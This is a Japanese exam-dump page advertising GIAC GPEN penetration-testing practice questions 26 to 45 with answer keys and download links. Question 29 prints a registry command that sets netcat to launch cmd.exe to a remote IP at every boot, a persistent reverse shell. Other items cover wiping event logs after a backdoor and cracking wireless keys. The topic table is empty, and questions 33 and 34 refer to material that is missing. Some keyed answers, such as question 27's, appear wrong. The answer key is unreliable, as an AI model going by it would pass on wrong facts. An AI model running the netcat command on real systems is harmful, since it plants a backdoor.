更新されたPDF(2022年最新)実際にあるGIAC GPEN試験問題
検証済みのGPEN試験問題集PDF[2022年最新] 成功の秘訣はJPNTest
GIAC GPEN 認定試験の出題範囲:
| トピック | 出題範囲 |
|---|---|
| トピック 1 |
|
| トピック 2 |
|
| トピック 3 |
|
| トピック 4 |
|
| トピック 5 |
|
| トピック 6 |
|
質問 26
You want to retrieve password files (stored in the Web server's index directory) from various Web sites. Which of the following tools can you use to accomplish the task?
- A. Nmap
- B. Google
- C. Whois
- D. Sam spade
正解: B
解説:
Section: Volume C
質問 27
Which protocol would need to be available on a target in order for Nmap to identify services like IMAPS and POP3S?
- A. HTTPS
- B. SSL
- C. TLS
- D. LDAP
正解: A
解説:
Section: Volume B
Explanation/Reference:
http://nmap.org/book/vscan.html
質問 28
The resulting business impact, of the penetration test or ethical hacking engagement is explained in what section of the final report?
- A. Findings
- B. Problems
- C. Impact Assessment
- D. Executive Summary
正解: D
解説:
Reference:
http://www.frost.com/upld/get-data.do?id=1568233
質問 29
You run the following command on the remote Windows server 2003 computer: c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t
REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe"
What task do you want to perform by running this command?
Each correct answer represents a complete solution. Choose all that apply.
- A. You want to set the Netcat to execute command any time.
- B. You want to perform banner grabbing.
- C. You want to put Netcat in the stealth mode.
- D. You want to add the Netcat command to the Windows registry.
正解: A,C,D
質問 30
Every network device contains a unique built in Media Access Control (MAC) address, which is used to identify the authentic device to limit the network access. Which of the following addresses is a valid MAC address?
- A. 132.298.1.23
- B. 1011-0011-1010-1110-1100-0001
- C. A3-07-B9-E3-BC-F9
- D. F936.28A1.5BCD.DEFA
正解: C
解説:
Section: Volume C
質問 31
John works as a professional Ethical Hacker. He is assigned a project to test the security of www.we-are- secure.com. John has gained the access to the network of the organization and placed a backdoor in the network. Now, he wants to clear all event logs related to previous hacking attempts. Which of the following tools can John use if we-are-secure.com is using the Windows 2000 server?
Each correct answer represents a complete solution. Choose two.
- A. AuditPol
- B. Blindside
- C. elsave.exe
- D. WinZapper
正解: C,D
解説:
Section: Volume C
質問 32
Which of the following syntaxes is the correct syntax for the master.dbo.sp_makewebtask procedure?
- A. sp_makewebtask [@query =] 'query', [@inputfile =] 'inputfile'
- B. sp_makewebtask [@query =] 'query', [@outputfile =] 'outputfile'
- C. sp_makewebtask [@inputfile =] 'inputfile', [@query =] 'query'
- D. sp_makewebtask [@outputfile =] 'outputfile', [@query =] 'query'
正解: D
解説:
Section: Volume D
質問 33
John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He is using a tool to crack the wireless encryption keys. The description of the tool is as follows:
Which of the following tools is John using to crack the wireless encryption keys?
- A. Kismet
- B. Cain
- C. AirSnort
- D. PsPasswd
正解: C
質問 34
Given the following Scapy information, how is default Layer 2 information derived?
- A. The default layer 2 information is contained in a local scapy.cfg configuration fileon the local system.
- B. If not explicitly defined, pseudo-random values are generated for the Layer 2 defaultinformation.
- C. Scapy relies on the underlying operating system to construct Layer 2 information touse as default.
- D. If not explicitly defined, the Ether type field value Is created using the hex value ofthe destination port, in this case 80
正解: B
質問 35
Which of the following statements are true about SSIDs?
Each correct answer represents a complete solution. Choose all that apply.
- A. SSIDs are case insensitive text strings and have a maximum length of 64 characters.
- B. All wireless devices on a wireless network must have the same SSID in order to communicate with each other.
- C. SSID is used to identify a wireless network.
- D. Configuring the same SSID as that of the other Wireless Access Points (WAPs) of other networks will create a conflict.
正解: B,C,D
質問 36
Which of the following is a tool for SSH and SSL MITM attacks?
- A. Cain
- B. AirJack
- C. Ettercap
- D. Dsniff
正解: D
解説:
Section: Volume D
質問 37
Which of the following tools automates password guessing in the NetBIOS session?
- A. L0phtCrack
- B. Legion
- C. NTInfoScan
- D. John the Ripper
正解: B
質問 38
Which of the following tools connects to and executes files on remote systems?
- A. PsExec
- B. Hk.exe
- C. GetAdmin.exe
- D. Spector
正解: A
質問 39
Which of the following password cracking tools can work on the Unix and Linux environment?
- A. John the Ripper
- B. Brutus
- C. Ophcrack
- D. Cain and Abel
正解: A
解説:
Section: Volume C
質問 40
Victor works as a professional Ethical Hacker for SecureEnet Inc. He wants to scan the wireless
network of the company. He uses a tool that is a free open-source utility for network exploration.
The tool uses raw IP packets to determine the following:
What ports are open on our network systems.
What hosts are available on the network.
Identify unauthorized wireless access points.
What services (application name and version) those hosts are offering.
What operating systems (and OS versions) they are running.
What type of packet filters/firewalls are in use.
Which of the following tools is Victor using?
- A. Kismet
- B. Nessus
- C. Nmap
- D. Sniffer
正解: C
質問 41
You work as a Network Administrator for Tech-E-book Inc. You are configuring the ISA Server
2006 firewall to provide your company with a secure wireless intranet. You want to accept inbound mail delivery though an SMTP server. What basic rules of ISA Server do you need to configure to accomplish the task.
- A. Access rules
- B. Network rules
- C. Mailbox rules
- D. Publishing rules
正解: D
解説:
Section: Volume C
質問 42
John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He performs a Teardrop attack on the we-are-secure server and observes that the server crashes. Which of the following is the most likely cause of the server crash?
- A. The spoofed TCP SYN packet containing the IP address of the target is filled in both the source and destination fields.
- B. The ICMP packet is larger than 65,536 bytes.
- C. The we-are-secure server cannot handle the overlapping data fragments.
- D. Ping requests at the server are too high.
正解: C
解説:
Section: Volume D
質問 43
Which of the following laws or acts, formed in Australia, enforces prohibition against cyber stalking?
- A. Stalking Amendment Act (1999)
- B. Malicious Communications Act (1998)
- C. Stalking by Electronic Communications Act (2001)
- D. Anti-Cyber-Stalking law (1999)
正解: A
質問 44
Which of the following is a valid google searching operator that is used to search a specified file type?
- A. inurl
- B. file type
- C. filetype
- D. intitle
正解: C
質問 45
......
ベストを体験せよ!GPEN試験問題トレーニングを提供しています:https://www.jpntest.com/shiken/GPEN-mondaishu
練習サンプルと問題集と秘訣には2022年最新のGPEN有効なテスト問題集:https://drive.google.com/open?id=1JbNQo4EaUE-0xDiUOW_K4XHIKJrn6gqF